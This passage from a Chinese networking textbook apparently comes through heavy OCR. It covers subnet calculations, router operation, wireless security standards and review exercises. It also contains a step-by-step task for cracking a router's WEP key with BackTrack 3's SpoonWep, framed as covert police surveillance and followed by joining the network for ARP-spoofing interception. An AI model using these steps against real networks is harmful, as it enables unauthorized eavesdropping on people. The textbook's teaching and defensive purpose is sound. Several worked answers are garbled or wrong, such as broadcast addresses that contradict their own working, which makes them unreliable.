表 5-6” 掩 码 为 255.255. 255. 240 的 子 网 划分 
子 网 地 址 ”| 子 网 广播 地 址 


子 网 IP 段 可 用 于 标识 主机 的 卫 段 
“| (最 小 IP) (最 大 IP) 

下 192. 168. 1. 16 | 192. 168. 1. 31 | 192. 168. 1. 16 一 192. 168. 1. 31 192. 168. 1. 17 一 192. 168. 1. 30 

2 192. 168. 1. 32 | 192. 168. 1. 47 | 192. 168. 1. 32 一 192. 168. 1. 47 192. 168. 1. 33 一 192. 168. 1. 46 

3 192. 168. 1. 48 | 192. 168. 1. 63 | 192. 168. 1. 48 一 192. 168. 1. 63 192. 168. 1. 49 一 192. 168. 1. 62 

4 192. 168. 1.64 | 192. 168. 1. 79 | 192. 168. 1. 64 一 192. 168. 1. 79 192. 168. 1. 65 一 192. 168. 1. 78 


13 | 192. 168. 1. 208 | 192. 168. 1. 223 | 192. 168. 1. 208 一 192. 168. 1. 223 | 192. 168. 1. 209 一 192. 168. 1. 222 
.224 一 192. 168. 1. 239 | 192. 168. 1. 225 一 192. 168. 1. 238 


亡 


14 | 192. 168. 1. 224 | 192. 168. 1. 239 | 192. 168. 


廊 


3. 实例 三 

将 192.168. 1.0 网 络 划 分 为 6 个 子 网 ,对 于 IP 地 址 192. 168. 1. 98, 求 其 子 网 掩 码 、 子 网 
地 址 、 子 网 广播 地 址 、 子 网 号 和 主机 号 。 
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分 析 : 将 C 类 网 络 划分 为 6 个子 网 , 子 网 掩 码 为 255. 255. 255. 224 ,意味 着 子 网 位 占用 
主机 位 3 位 ,剩余 5 位 作为 主机 位 。 将 98 转变 为 二 进 制 为 "01100010”, 即 处 于 第 011 子 网 
的 第 00010 主机 ,转换 为 十 进 制 为 第 3 子 网 第 2 主机 。 其 子 网 地 址 是 "01100000(96)”, 子 网 
广播 地 址 是 “01111111(127)”, 具 体 含义 如 下 。 

(1) 子 网 掩 码 : 255. 255. 255. 224 。 

(2) 子 网 地 址 : ”192. 168.1.96 。 

(3) 子 网 广播 地 址 : ”192.168.1.127 。 

(4) 192. 168. 1. 98 处 于 192. 168. 1.0 网 络 中 第 ”3 子 网 第 “2 主机 。 

然而 ,如 果 每 次 计算 都 要 重复 上 述 过 程 十 分 烦琐 , 则 会 给 管理 员 带 来 不 便 。 这 里 介绍 一 个 
更 为 简洁 的 算法 。 由 于 子 网 位 为 占 3 位 ,剩余 主机 位 占 5 位 ,此 时 每 个 子 网 共 包 含 于 一 32 个 
IP, 将 98/32, 商 3 余 2, 即 处 于 第 3 子 网 第 2 主机 。 子 网 地 址 为 32X3=969, 子 网 广播 地 址 
为 32X4 一 1=127®@。 

4. 实例 四 

对 于 192. 168. 1.35/30, 求 其 子 网 掩 码 、 子 网 地 址 、 子 网 广播 地 址 、 子 网 号 和 主机 号 。 

分 析 :“30” 表 示 子 网 掩 码 中 有 30 个 “1”, 即 “255. 255. 255.252”。 此 时 , 子 网 位 占 6 位 ， 
剩余 2 位 作为 主机 位 ,每 个 子 网 共 包 含 2 一 4 个 IP, 将 35/4, 商 8 余 3, 即 处 于 第 8 子 网 第 3 
主机 。 其 子 网 地 址 为 4X8 王 32, 子 网 广播 地 址 为 4X9 一 1= 王 35, 具 体 含义 如 下 。 

(1) 子 网 掩 码 : 255. 255. 255. 252 。 

(2) 子 网 地 址 : ”192. 168.1.32 。 

(3) 子 网 广播 地 址 : ”192. 168. 1.135 。 

(4) 192. 168. 1. 98 处 于 192. 168. 1.0 网 络 中 第 _8_ 子 网 第 _2 主机 。 

5. 实例 五 

对 于 172. 16. 100. 5/20 , 求 其 子 网 掩 码 . 子 网 地 址 . 子 网 广播 地 址 。 

分 析 :“20” 表 示 子 网 掩 码 中 有 20 个 “1”, 即 “255. 255. 240. 0”。 此 时 , 子 网 位 占 4 位 , 剩 
余 12 位 作为 主机 位 。 将 “100. 5” 转 变 为 二 进 制 为 *01100100. 00000101”, 即 处 于 第 0110 子 
网 的 第 010000000101 主机 。 其 子 网 地 址 是 “01100000. 00000000(96.0)”, 子 网 广播 地 址 是 
“01101111. 11111111(111. 255)”, 具 体 含 义 如 下 。 

(1) 子 网 掩 码 : 255. 255. 240.0 。 

(2) 子 网 地 址 : ”172. 16. 96.0 。 

(3) 子 网 广播 地 址 : ”192. 168. 111. 255 。 


5.5 路 由 器 工作 原理 与 安全 


本 工作 任务 主要 讲述 破解 WEP 加 密 的 无 线路 由 器 密 钥 ,要 求 掌握 路 由 器 加 密 技 术 和 
BT3 工具 的 使 用 ,并 学 会 相应 防范 措施 。 


四 ”被 乘 数 32 表示 每 个 子 网 含 32 个 卫 , 乘 数 3 表示 第 3 子 网 。 
加 子 网 广播 地 址 值 也 等 于 下 一 子 网 地 址 减 1。 
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工作 任务 六 玻 解 无 线 WEP 密 铀 


工作 目的 
破解 无 线路 由 器 WEP 密 钥 。 
工作 任务 
小 张 是 公安 局 科技 部 工作 人 员 , 需 对 嫌疑 犯 王 某 进 行 24h 监控 。 小 张 发 现 王 某 使 用 
SSID 为 “16-1604? 的 无 线路 由 上 网 。 上 级 要 求 小 张 渗透 王 某 无 线 网 络 ,截获 其 发 送 的 信息 
并 进行 取证 。 
任务 分 析 
无 线路 由 器 默认 使 用 WEP 加 密 以 防止 无 线 窃 听 和 入 侵 。WEP 采用 RC4 加 密 算法 , 密 
钥 分 散 随 数据 一 起 发 送 , 只 要 截获 到 足够 数量 的 WEP 验证 包 , 即 可 以 通过 穷 举 法 分 析 
WEP 密 钥 。 基 于 上 述 考虑 ,小 张 使 用 BT3 系统 中 的 SpoonWep 工具 渗透 王 某 使 用 的 无 线 
网 络 。 
工作 环境 和 工具 
具体 工作 环境 和 工具 见 表 5-7 ,工具 和 录像 可 在 http://www. gdcp. cn/jpkc/lf 中 下 载 。 
表 5-7 工作 任务 六 的 工作 环境 和 工具 
主机 名 称 担任 角色 IP 地 址 操作 系统 工具 软件 
主机 1 小 张 BT3(Linux) 带 硬件 解密 的 无 线 网 卡 、.BT3 
无 线路 由 器 疑犯 王 某 192. 168. 1.1 


BT3 全 称 Back Track 3, 是 一 个 基于 Linux 环境 的 便携 系统 ,可 以 放 到 U 盘 或 光盘 中 
启动 加 载 。BT3 内 置 大 量 网 络 检测 工具 以 及 黑客 破解 软件 而 出 名 ,其 中 内 置 的 SpoonWep 
软件 集 ARP 欺骗 .数据 捕 包 和 碎片 注入 功能 于 一 身 , 是 一 个 非常 强悍 的 图 形 化 破解 WEP 
无 线 密码 工具 。 

工作 过 程 

(1) 启动 BT3 系统 。 下 载 BT3 并 制作 U 盘 
或 光盘 启动 ,选中 默认 启动 项 “BT3 Graphics mode 


prs nisk 


KDE”, 进 入 BT3 系统 ,如 图 5-29 所 示 。 J 


(2) 选中 网 卡 和 驱动 。 在 “运行 "文本 框 里 输 jw ” 
人 “SpoonWep” 进 入 破解 界面 。 在 NET CARD 下 民 Ee 
拉 列 表 中 选中 所 使 用 的 无 线 网 卡 型 号 ; 在 
DRIVER 驱动 项 中 选择 “NORMAL”; 在 破解 目 
标 MODE 下 拉 列 表 中 选择 "UNKNOWN VICTIM” (未知 目标 ), 选 好 后 单 击 NEXT 按钮 ， 
如 图 5-30 所 示 。 

(3) 扫描 目的 网 络 。 选 择 VICTIMS DISCOVERY 选项 卡 , 单 击 LAUNCH 按钮 扫描 
周边 无 线 网 络 ,发 现 目标 SSID*16-1604”。 其 中 ,“MAC” 是 王 某所 使 用 的 无 线路 由 器 物理 
地 址 ;“CHAN” 是 当前 信道 ;“POW” 是 信号 强度 ;“CLS” 选 中 表示 无 线 网 络 拥 有 客户 端 ， 
即 王 某 正在 使 用 该 无 线 信 号 接 人 Internet, 如 图 5-31 所 示 。 


图 5-29 启动 BT3 系统 


98 


第 5 章 网 络 层 协议 和 子 网 规划 


FT 


图 5-30 选中 无 线 网 卡 型 号 


图 5-31 扫描 无 线 信号 
(4) 配置 攻击 方式 。WEP 有 4 种 破解 方式 ,2 种 密 钥 长 度 (64 位 或 者 128 位 )。 其 中 ， 
使 用 *FRAGMENTATION ATTACK? 来 产生 一 个 新 的 数据 包 以 便 注入 ;“??? LENGTH” 
表示 未 知 密 钥 长 度 。 当 选中 相应 选项 后 单 击 LAUNCH 按钮 开始 破解 ,如 图 5-32 所 示 。 


图 5-32 配置 攻击 方式 


(5) 查看 WEP 密 钥 。 在 此 例 中 , 当 捕获 约 15000 个 WEP 验证 包 时 ,破解 到 的 无 线 
WEP 密 钥 为 “38:37:36:35:34”, 如 图 5-33 所 示 。 

(6) 渗透 目标 网 络 。 输 入 上 述 WEP 密 钥 并 加 入 “16-1604” 的 无 线 网 络 ,通过 “Ipconfig /all" 查 
看 网 卡 状态 ,如 图 5-34 所 示 。 此 时 ,无 线 网 卡 已 经 从 路 由 器 中 自动 获取 到 IP 地 址 ,表示 已 
经 成 功 加 入 目标 网 络 , 接 下 来 可 以 通过 ARP 欺骗 对 王 某 发 出 的 信息 进行 监听 ,详细 参阅 上 
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aaads 党 


LENGTH (CRAT 


UCK LAUNCH 


图 5-33 破解 到 的 WEP 密 钥 


二 可 国 从 久 
进 阶 5 信息 


无 线 网 络 统计 资料 “优先 权 设 定 。 WPs 
排序 >> © Nish @ ms 人 @ 信 S 强 度 
网络 清单 
bp 161604 也 5 9 9 70x mm - 
ChinaNet-347Y 也 : 站 分 ox mm 
dk | 
emeit Ethernet 
di Connection— 
TENDA scri : 882.1in USB Wirele: 
80-8D-89-50-DE-BB 
TP-LINK_2¢ " 
十 新 扫 蛤 : :192.168.1.104 
-255.255.0 
-168.1.1 
-168.1.1 
EE 2 
iE 
全 12 
2818 年 5 月 12 日 2 
图 5-34 加 入 的 无 线 网 络 
QO 
任务 总 结 3 
无 线 局 域 网 车 采用 默认 WEP 加 密 , 其 使 用 的 RC4 加 密 算法 存在 安全 缺陷 ,将 完整 密 钥 


分 割 乱 序 随 数据 包 一 起 传输 ,因此 只 要 捕获 足够 数量 的 数据 包 并 重组 分 析 就 可 以 分 析 初 始 
密 钥 。 为 避免 入侵 ,无 线路 由 应 尽量 采用 WPA 或 WPA2 认证 加 密 。 


访 马 ,知识 拓展 
路 由 器 (Router) 工 作 于 OSI 参考 模型 第 三 层 , 即 网 络 层 。 路 由 器 主要 任务 是 通过 IP 多 


辑 地 址 寻 径 ,找到 一 条 抵达 目的 网 络 0 的 最 佳 路 径 。 在 互联 网 中 ,每 个 路 由 器 基于 路 由 算法 


@ 路 由 器 只 是 将 数据 包 投递 到 对 方 网 络 ,而 投递 到 目的 主机 任务 交 由 对 方 网 络 的 交换 机 完成 。 
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将 数据 包 转 发 至 下 一 个 离 目 的 网 络 更 近 的 路 由 器 ,通过 多 个 路 由 器 一 站 一 站 以 接力 方式 转 
发 至 目的 地 ,如 图 5-35 所 示 。 


便 


图 5-35 路 由 器 寻 径 


5.5.1 路 由 器 工作 原理 


当 路 由 器 接收 到 一 个 数据 包 时 ,将 目的 IP 和 子 网 掩 码 做 相 与 运算 ,得 到 网 络 号 ,再 查询 
路 由 表 转 发 。 如 图 5-36 所 示 , Router A 接收 到 一 个 发 往 10. 1. 5. 22/24 的 数据 包 , 将 
“10. 1. 5. 22” 与 其 子 网 掩 码 “255. 255. 255. 0" 相 与 得 到 网 络 号 “10. 1. 5. 0”?, 再 查询 路 由 表 ， 
找到 最 后 一 项 去 抵 "10. 1.5.0/24” 网 络 , 对 应 下 一 跳 IP 是 “10. 1. 2.2”( 即 Router B 左边 的 
Fa 0/0 接口 ), 则 Router A 把 数据 包 向 Router B 转发 。Router B 从 Fa 0/0 接口 接收 到 一 
个 发 往 10. 1.5.22/24 的 数据 包 , 同 样 将 IP“10. 1. 5. 22” 与 其 子 网 掩 码 “255. 255. 255. 0” 相 
与 得 到 网 络 号 "10. 1. 5. 0”, 通 过 查询 路 由 表 找到 去 抵 *10. 1. 5.0/24” 网 络 的 下 一 跳 IP 是 
“10.1.3.2”( 即 Router C 左边 的 Fa 0/0 接口 ) , 则 向 Router C 转发 。Router C 依 此 类 推 直 
至 将 数据 包 接 力 至 目的 网 络 。 


5.5.2 路 由 器 和 交换 机 区 别 


路 由 器 和 交换 机 从 表面 上 看 都 是 对 数据 进行 转发 ,但 两 者 有 本 质 区 别 。 

首先 是 工作 层次 不 同 。 交 换 机 工作 于 数据 链 路 层 ,对 数据 帧 目的 Mac 地 址 转发 ; 路 由 
器 工作 于 网 络 层 , 对 数据 包 目 的 IP 地 址 进行 转发 。 

其 次 是 功能 不 同 。 路 由 器 用 于 连接 异 构 网 络 & ,基于 IP 地 址 将 数据 包 转 发 至 目的 网 络 
路 由 器 ; 而 交换 机 用 于 连接 局 域 网 主机 ,负责 向 内 网 主机 转发 数据 帧 。 

再 次 是 工作 原理 不 同 。 路 由 器 需要 将 IP 地 址 与 子 网 掩 码 做 相 与 运算 找到 目的 网 络 ,并 
通过 路 由 算法 生成 路 由 表 , 还 要 要 查找 路 由 表 对 数据 包 进行 转发 ; 而 交换 机 只 是 简单 地 通 
过 查找 Mac- 端口 ?映射 表 转 发 数据 帧 ,不 需 做 任何 运算 ,因此 交换 机 相对 廉价 ,工作 效率 
高 ; 而 路 由 器 比较 昂贵 ,转发 效率 远 不 如 交换 机 ,往往 成 为 整个 网 络 瓶颈 。 


@ 计算 过 程 如 下 : 
ololololilolilollolololololololi| |ololololol1ilol1|lololol1l0|1|1|0 
10. 1 5. 22 
与 ji HE ENSHSHIBHNBDNDNDNGENINDNDNOUNDUNBUNDUE IOOolololololo 
255. 255. 255. 0 


Tr 


ol0ololol1I0I1|I0|I0I01010101010I1|10I0l0I0I0|1|0|1|101010101010|010 
10. [ 5. 0 


回 即 IP 地 址 不 同 的 网 络 。 
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To: 下 
10.1.5.22/24 Router C 
FaO0/! RouterA 


Network ”Next hop 
10.1.1.0/24 ”connected 
10.1.2.0/24 connected 


10.1.3.0/24 10.1.2.2 10.1.2.2 
10.1.4.0/24 10.1.2.2 RouterB Network 。 Next hop RouterD 
10.1.5.0/34 10.1.3.3 10.1.1.0/24 10.1.3. 


10.1.2.0/24 10.1.3.1 
10.1.3.0/24 connected 
10.1.4.0/24 connected 
10.1.5.0/24 10.1.4.2 


Network Nexthop 
10.1.1.0/24 ”10.1.2.1 
10.1.2.0/24 connected 


Network Nexthop 
10.1.1.0/24 10.1.4.1 
10.1.2.0/24 10.1.4.1 
10.1.3.0/24 10.1.4.1 
10.1.4.0/24 connected 
10.1.5.0/24 connected 


10.1.3.0/24 connected 
10.1.4.0/24 10.1.3.2 
10.1.5.0/24 10.1.3.2 


图 5-36 路 由 器 工作 原理 


最 后 是 安全 性 不 同 。 交 换 机 只 能 简单 地 对 Mac 地 址 进行 过 滤 ; 而 路 由 器 可 以 灵活 地 
根据 IP 地 址 、 网 络 状 态 、 端 口 序号 等 过 滤 数 据 包 , 充 当 网 络 防火 墙角 色 。 另 外 ,如 数据 加 密 、 
数据 压缩 ` 数 据 纠 错 任务 也 可 以 由 路 由 器 完成 。 


5.5.3 无 线 局 域 网 与 无 线路 由 器 安全 


无 线 局 域 网 WLAN(Wireless Local Area Network) 是 计算 机 网 络 与 无 线 通 信 相 结合 的 
产物 。 “无 线 " 定 义 了 网 络 连接 方式 ,省 去 了 传统 局 域 网 中 的 传输 电缆 ,利用 红外 线 、 蓝 牙 和 
微波 等 无 线 介 质 传输 信号 ;“ 局 域 网 ?定义 了 网 络 应 用 范围 ,是 将 小 范围 内 各 种 设备 相互 连 
接 形 成 的 通信 网 络 。 

自 第 二 次 世界 大 战 以 来 ,无 线 通信 以 其 在 军事 上 的 卓越 成 效 而 备 受 重视 。 直 至 20 世纪 
80 年 代 , 无 线 技术 首次 应 用 于 局 域 网 通信 之 中 ,各 厂商 纷纷 推出 各 自 WLAN, 只 能 提供 
1Mbps 一 2Mbps 带宽 。 虽然 当初 的 WLAN 缺乏 统一 协议 ,不 同 厂商 之 间 设 备 无 法 互通 ,但 
由 于 无 线 技术 可 以 避免 复杂 烦琐 的 布线 成 本 , 故 以 其 极 大 的 灵活 性 和 自由 度 得 到 广泛 应 用 。 
1997 年 IEEE (The Institute of Electrical and Electronics Engineers) 美国 电气 和 电子 工程 
师 协 会 首次 发 布 无 线 局 域 网 802. 11 系列 标准 ,从 此 无 线 局 域 网 走向 兼容 性 和 互 操作 性 。 
1999 年 IEEE 又 提出 802. 11a( 频 段 5GHz, 速 率 54Mbps) 标 准 和 802. 11b( 频 段 2. 4GHz, 速 
率 11Mbps) 标 准 ,并 采用 WEP 静态 加 密 方案 对 明文 数据 进行 加 密 , 用 户 可 以 得 到 同 传统 以 
太 网 一 样 的 性 能 和 吞吐 量 。2004 年 7 月 ,IEEE 为 弥补 脆弱 的 WEP 加 密 提 出 了 802. 11i 无 
线 安全 标准 ,通过 WPA/WPA2 动态 密 钥 对 数据 进行 加 密 。 为 提高 局 域 网 传输 速率 ,2004 年 
1 月 IEEE 发布 802. 1ln 标准 ,带宽 可 达 300Mbps, 比 以 往 无 线 网 络 传输 更 快 更 远 。 
IEEE 802. 11 系列 各 标准 见 表 5-8。 

无 线路 由 器 采用 电磁 波 载 体 传 输 数据 。 随 着 无 线 局 域 网 广泛 应 用 ,其 安全 性 问题 越 来 
越 受 关注 。 对 于 传统 有 线 网 络 而 言 ,传输 信号 只 有 在 物理 链 路 遭 到 破坏 情况 下 才 有 可 能 泄 
漏 。 而 无 线 网 络 中 数据 以 微波 为 载体 在 空气 中 辐射 传播 ,只 要 在 信号 覆盖 范围 内 的 无 线 网 
卡 都 可 以 接收 数据 ,因此 无 线 局 域 网 安全 性 和 保密 性 问题 尤为 突出 ,基本 安全 技术 有 以 下 
几 种 。 
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表 5-8 IEEE 802.11 标准 


标准 描 述 传输 速率 | 最 大 传输 距离 /m | 工作 频率 
802. 11b | 目前 最 成 熟 .最 通用 的 无 线 协议 标准 11Mbps 100~300 2.4GHz 


与 目前 最 主流 的 802. 11b 不 兼容 ,其 地 位 

802. 11a | 逐步 被 802. 11g 标准 产品 替代 ,产品 价位 | 54Mbps 50 一 100 5GHz 

远 高 于 802. 11b 

只 有 美国 TI 公司 一 家 提供 芯片 ,产品 不 具 

802. 11b 十 22Mbps 100~300 2.4GH 
备 与 其 他 产品 兼容 性 ,已 逐渐 淡出 市 场 罗 


目前 标准 出 台 不 久 , 各 厂商 产品 兼容 性 不 


802. 11 54Mbps 50 一 100 2. 4GHL 
和 | 统一 , 尚 不 成 熟 册 “ 
8o2 11 未 来 的 发 展 趋势 ,向 下 兼容 802. 11a/b/g， 300Mbps 一 了 2.4GHz 一 
” ”| 提供 高 质量 ,高 带宽 的 无 线 传输 服务 600Mbps a 5GHz 


1. 访问 控制 技术 

为 提高 无 线 网 络 安全 性 ,IEEE 802. 11b 协议 首先 采用 访问 控制 限制 无 线 设备 接 入 。 每 
个 无 线路 由 器 可 以 配置 特定 ESSID, 只 有 当 接 入 的 ESSID 与 无 线路 由 器 的 SSID 相 一 致 时 ， 
无 线 网 卡 才能 加 入 局 域 网 。 这 意味 着 无 线路 由 可 以 通过 隐藏 自身 SSID 限制 非法 用 户 的 接 
人 ,避免 任意 漫游 带 来 的 安全 性 问题 。 

另 一 种 访问 控制 技术 是 通过 Mac 地 址 限制 非法 用 户 接 人 。 由 于 每 一 块 无 线 网 卡 都 拥 
有 唯一 Mac 地 址 , 故 可 以 在 无 线路 由 器 内 部 建立 一 张 *Mac 地 址 控制 表 ”(Access Control)， 
只 有 列表 内 的 合法 用 户 才能 接 和 人 无 线 网 络 , 从 而 有 效 避 免 未 经 授权 用 户 的 非法 访问 。 

2，WEP 数据 加 密 

无 线 局 域 网 数据 传输 可 以 通过 WEP(Wired Equivalent Privacy) 协 议 进行 加 密 。WEP 
是 IEEE 802. 11b 协议 中 最 基本 的 安全 加 密 措施 ,也 是 无 线路 由 器 默认 的 加 密 方 式 。 它 采 
用 64 位 或 128 位 静态 密 钥 对 初始 数据 进行 RC4 加 密 处 理 ,客户 端 在 接收 到 密 文 后 逆向 还 
原 成 初始 明文 ,从 而 防止 数据 窃听 次 用。 然而 ,RC4 加 密 算法 存在 安全 缺陷 , 它 将 唯一 完整 
密 钥 分 割 乱 序 后 随 不 同 数据 包 一 起 传输 ,因此 只 要 捕获 足够 数量 的 数据 包 并 重组 就 可 以 分 
析 还 原 成 原始 密 钥 。 

3. 新 一 代 无 线 安全 技术 一 一 IEEE 802. 11i 

在 安全 性 需求 较 高 的 场合 ,如 大 型 企业 、 银 行 、 证 券 行 业 , 仅 仅 使 用 最 基本 的 WEP 数据 
加 密 并 不 能 完全 达到 安全 需求 。IEEE 组 织 目 前 正在 开发 下 一 代 无 线 安全 标准 IEEE 802. 11i， 
并 致力 于 从 长 远 角度 考虑 解决 无 线 局 域 网 的 安全 问题 。 

(1) WPA-TKIP 安全 规范 

WPA(Wi-Fi Protected Access) 作 为 IEEE 802. 11i 标准 的 大 部 分 ,是 在 802. 11i 完备 
之 前 替代 WEP 的 过 渡 方案 ,其 核心 就 是 IEEE 802. 1x 认证 技术 和 TKIP(Temporal Key 
Integrity Protocol) 临时 密 钥 集成 协议 。IEEE 802. 1x 用 于 对 接 入 设备 进行 安全 认证 ,TKIP 
用 于 动态 密 钥 细 分 ,每 发 一 个 数据 包 重 新 生成 一 个 新 密 钥 。 虽 然 WPA 仍 使 用 RC4 算法 对 
数据 进行 加 密 , 但 是 由 于 密 钥 定期 更 新 , 故 暂 无 法 使 用 类 似 破解 WEP 方法 一 样 ,通过 捕获 
数据 包 分 析 破 解密 钥 。 然 而 , 随 着 技术 不 断 发 展 ,WPA 也 会 像 WEP 一 样 存在 安全 风险 。 
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(2) WPA2-AES 安全 规范 

WPA2(WPA 第 二 版 ) 是 对 IEEE 802. 11i 标准 的 安全 增强 方案 ,也 是 目前 无 线路 由 中 
最 高 的 加 密 模式 ,由 于 需要 通过 额外 硬件 对 数据 进行 AES 加 密 , 不 能 单 靠 软件 升级 实现 , 因 
此 这 种 加 密 模式 尚未 广泛 普及 。 


本 章 小 结 


本 章 是 整 本 书 篇 幅 最 长 ,也 是 最 重要 的 一 章 。IP 协议 是 因特网 的 核心 协议 , 随 着 网 络 
应 用 的 全 面 普及 ,IP 协议 也 不 断 发 展 以 适应 新 的 需求 。 本 章 重 点 要 求 读者 掌握 IP 地 址 分 
类 及 子 网 划分 计算 。 子 网 规划 灵活 多 样 , 且 不 是 一 成 不 变 的 , 既 要 考虑 到 当前 网 络 规 模 ,又 
要 考虑 到 日 后 发 展 ; 既 要 适应 用 户 需 求 ,又 要 减少 不 必要 浪费 ,这 些 在 IP 规划 时 都 要 综合 
考虑 。 本 章 知识 结构 如 图 5-37 所 示 。 


最 短 通路 算法 
总站 出 和 法 | 
ma A 
距离 矢量 路 由 算法 (RIP) 
a 有 乔 CORP 
四 大 功能 
拥塞 控制 
流量 控制 
传输 方式 站 连接 
无 连接 
A 类 : 0 一 127 ,大 规模 网 络 
B 类 : 128 一 191, 中 规模 网 络 
IP 地 址 的 分 类 4C 类, 192 一 223 ,小 规模 网 络 
D 类 : 224 一 239 ,组 播 
正 类: 240 一 255, 未 定义 
网 络 层 4 IP 网 际 协议 环 回 地 址 : 127. X. X. xX 
未 知 地 址 : 0. 0.0.0 
网 络 位 0: 某 主机 
特殊 IP 主机 位 0: 某 网 段 
广播 地 址 : 255. 255. 255. 255 
169.254 网 段 : 自动 获取 IP 不 成 功 
A 类 : 10.0.0.0~10.255. 255. 255 
私有 IP4B 类 : 172. 16. 0.0 一 172. 31. 255. 255 
C 类 : 192.168.0. 0 一 192.168. 255. 255 
2b: 192 
3b: 224 
子 网 位 14b: 240 
5b 248 
6b: 252 


图 5-37 第 5 章 知识 结构 图 
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OSP. 


思考 练习 题 
一 、 填空 题 
1. 路 由 算法 分 为 静态 路 由 算法 和 动态 路 由 算法 ,其 中 最 短 通路 算法 属于 
F 属于 6 
2. IPv4 的 IP 地 址 长 度 为 位 ,地 址 192. 168. 1.0 默认 子 网 掩 码 为 


3. 192. 168.1.0 网 络 若 要 划分 为 7 个 子 网 , 则 子 网 掩 码 应 设 为 
4. 如 果 借 用 一 个 C 类 IP 地 址 的 6 位 主机 号 划分 子 网 , 则 子 网 掩 码 应 该 设 为 


5. 广播 地 址 为 ,用 于 向 同一 网 段 所 有 主机 发 送 数据 。 
二 、 选 择 题 
1. 以 下 用 户 仅 可 以 在 本 地 内 部 网 络 中 使 用 的 专用 IP 地 址 是 g 
A: 92% 168.1.1 B2010. .1 C. 202, 113. 1.1 D. 203.5.1.1 
2. 路 由 器 工作 在 OSI 参考 模型 的 
A. 网 络 层 B. 传输 层 C. 数据 链 路 层 D. 物理 层 


3. 同 个 局 域 网 计算 机 被 划 入 不 同 子 网 中 ,不 同 子 网 的 计算 机 要 实现 互通 应 通过 
连接 。 


A. 交换 机 B. 集线器 C. 路 由 器 D. 网 桥 

4. 为 了 避免 IP 地 址 的 浪费 ,需要 对 IP 地 址 中 的 主机 位 再 次 划分 子 网 , 即 
A. 子 网 号 和 主机 号 B. 子 网 号 和 网 络 号 
C. 主机 号 和 网 络 号 D. 子 网 号 和 分 机 号 

5. 在 ISO/OSI 参 考 模型 中 ,网 络 层 的 主要 功能 是 N 


A. 提供 可 靠 的 端 到 端 服务 ,透明 地 传送 报 文 
B， 路 由 选择 和 拥塞 控制 ,实现 发 送 方 和 接收 方 的 连接 
C. 在 通信 实体 之 间 传 送 以 帧 为 单位 的 数据 


D. 数据 格式 变换 
6. 下 面 IP 地 址 中 属于 C 类 IP 地 址 的 是 区 
A. 10.10.10.1 B. 172.168.0.1 
C. 191.168.0.1 BD 202: T1130.1 
7. 若 节点 IP 地 址 为 172. 16. 10.100, 子 网 掩 码 为 255. 255. 255. 0, 则 该 节点 所 处 子 网 
地 址 为 
A. 172. 16. 10. 100 B. 172. 16. 10.0 
C. 172.16,101 D172 6 10r255 
8. 如 果 借 用 一 个 C 类 IP 地 址 的 4 位 主机 号 划分 子 网 , 则 子 网 掩 码 应 该 设 为 
W255..2555255, 192 Bs. 25542556 2555224 
C. 255. 255. 255. 240 D. 255. 255. 255. 248 
9. 当主 机 设置 为 自动 获取 IP 地 址 ?时 ,将 使 用 地 址 向 DHCP 服务 器 索取 IP 
地 址 。 
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A 050 B., 下 7.050. 
C. 255. 255. 255. 255 D; 192. 168.1.1 
10. 全 “1” 的 IP 地 址 被 称 为 有 限 广播 地 址 ,车 某 主机 使 用 全 “1” 地 址 作为 目的 地 址 , 则 
将 向 发 送信 息 。 


A. 本 网 络 中 所 有 主机 B. 某 网 络 中 所 有 主机 
C. 某 网 络 中 某 一 主机 D. 所 有 网 络 中 所 有 主机 
11. 车 IP 地 址 为 128. 202. 10. 38 , 子 网 掩 码 为 255. 255. 255. 0, 则 该 节点 所 处 子 网 地 址 
为 
A. 128. 202. 10. 38 B. 128. 202. 10.0 
€. 128:202, 10;1 D. 128. 202.10.255 
12. 车 IP 地 址 为 172. 16. 1. 23, 子 网 掩 码 为 255. 255. 0.0, 则 其 处 于 第 子 网 。 
A. 1 ) 放 人 D. 没有 子 网 
13. 若 IP 地 址 为 202. 16. 3. 34, 子 网 掩 码 为 255. 255. 0. 0, 则 其 处 于 第 子 网 。 
二 日 B. 2 时 D. 没有 子 网 
14. 下 面 IP 地 址 属于 B 类 IP 地 址 的 是 
A, 2 LiL L681 B; 191. 108. 111;2 
忆 192.199, ,35 D. 234.125.13.110 
15. 在 C 类 IP 地 址 中 ,一 个 网 络 能 够 容纳 台 主 机 。 
A. 254 B. 255 C. 256 D. 无 数 
16. 以 下 不 属于 网 络 层 功 能 的 是 
A. 路 由 选择 B. 流量 控制 
C. 数据 包 分 组 D. 建立 ,维护 和 释放 连接 
17. 在 Internet 中 ,数据 包 按 进行 寻 址 。 
A. 邮件 地 址 B. IP 地 址 C，Mac 地 址 D. 网 线 接口 地 址 
18. 若 节点 IP 地 址 为 172. 16. 10. 100 , 子 网 掩 码 为 255. 255. 255. 0, 则 该 节点 所 处 子 网 
地 址 为 
A. 172. 16. 10. 100 B.;, 172., 16; 10;0 
他 D，172. 16. 10.255 


19. 若 节点 IP 地 址 为 128. 202. 10. 38 , 子 网 掩 码 为 255. 255. 255. 0, 则 该 节点 所 处 子 网 
地 址 为 。 


A. 128. 202. 10. 38 B. 128. 202. 10.0 
全 020 D. 128. 202. 10. 255 
20. 在 因特网 中 ,地 址 解析 协议 ARP 是 用 来 解析 。 
A. IP 地 址 与 Mac 地 址 的 对 应 关系 B. Mac 地 址 与 端口 号 的 对 应 关系 
C. IP 地 址 与 端口 号 的 对 应 关系 D. 端口 号 与 主机 名 的 对 应 关系 
21. 关于 IP 协议 ,以 下 说 法 错误 的 是 é 


A. IP 协议 是 一 种 互联 网 协议 

B. IP 协议 定义 了 IP 数据 报 的 具体 格式 

C. IP 协议 要 求 下 层 必须 使 用 相同 的 物理 网 络 
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D. IP 协议 为 传输 层 提供 服务 


22. 如 果 借 用 一 个 C 类 IP 地 址 的 3 位 主机 号 部 分 划分 子 网 ,那么 子 网 屏蔽 码 应 该 
为 
A. 255. 255. 255. 192 B. 255. 255. 255. 224 
C. 255. 255. 255. 240 D. 255. 255. 255. 248 
23. 下 面 IP 地 址 中 属于 私 用 IP 地 址 的 是 局 
A. 192.16 .1.10 本 3 
C. 191.168.0.1 D. 10; 113. 3219 
24. 路 由 器 用 于 网 络 互联 , 它 对 各 层 网 络 协议 的 要 求 是 
A. 物理 层 以 上 的 协议 应 相同 B. 网 络 层 以 上 的 高 层 协议 相同 
C. 数据 链 路 层 以 上 的 协议 相同 D. 网 络 层 以 下 的 低层 协议 相同 
25. 网 络 层 向 用 户 提供 
A. 点 到 点 服务 B. 端 到 端 服务 
C. 发 送 方 到 接收 方 服务 D. 应 用 程序 到 应 用 程序 服务 
三 、 简 答题 
1. 简 述 网 络 层 功能 和 作用 。 
